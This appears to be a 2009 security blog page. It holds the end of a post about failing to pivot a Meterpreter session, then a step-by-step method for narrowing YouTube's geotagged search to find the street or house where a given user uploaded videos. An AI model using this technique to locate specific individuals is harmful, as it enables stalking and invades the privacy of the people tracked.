[*] Meterpreter session 2 opened.

So FAIL, FAIL, FAIL. I was unable to pivot a reverse_tcp meterpreter session. I can reach my goal by using the Meterpreter session on Victim1 to access the file server on Victim2 over the SMB ports, but that's not very sexy. Ed Skoudis' gender-bender netcat relays are a good option, but I want to do it with just Metasploit. So what is the right way to do this? Do you know? Add a comment!

Wednesday, January 28, 2009

I know where you live... or at least google does

Can you use YouTube.com to find out where a video was uploaded? I’m not saying you can. I’m not saying you can’t. But I think it is interesting to try. Using the following method YouTube has led me to the homes of a few people I know. Does it work for you??

Start with YouTubes “Advanced Search”.


Click "Advanced Options" and "Show Map". Type in the userid of the person you're trying to locate and click the SEARCH box inside the advanced search box (not the one at the top). If the video is in the circle it will be displayed in the result. If not you will see "No Videos found for xyz" and a playlist for the user you are searching for. The difference between a hit/no hit is subtle. Do a search for something you know is geoencoded so you can see the difference. As a rule, if you see this then the video is not in the circle.

No videos found for “USERXYZ”
Playlist Results for USERXYZ

Zoom in one click at a time, making your circle smaller and smaller to see if the video is still in the circle. If the search results disappear, it's no longer in the circle. Using this method you could take the search down to a city block or so. Then you can switch to http://maps.google.com/ and enable the YouTube overlay. You may find the video is placed directly on top of the house where it was uploaded. But a video overlay only appeared in 1 out of the 6 times that I tried to narrow down to a street. It looks like the YouTube overlay on Google Maps doesn't have as much data as the map search on YouTube.

I tested it with 3 videos where I knew the target street address and in all 3 cases was able to locate their street. In one of the three cases the Google Maps overlay displayed the YouTube video on top of the correct house. In one other case I narrowed down a video to a street, but when I asked the account owner about the address he had no idea how that address related to his video, although it was within a few miles of his house. There were several cases where I couldn't get YouTube to return any geo-encoded videos on that user's account. It's not science, but there is some interesting data being revealed by that search.

UPDATE 1-31: It appears that in the test case where the video led me to a strange location several miles from the account owner's home, the video may have been tagged to the geographic center of the zip code of the uploader. This is going to be a significant stumbling block for any open source YouTube geotagging missile guidance system projects resulting from this groundbreaking research.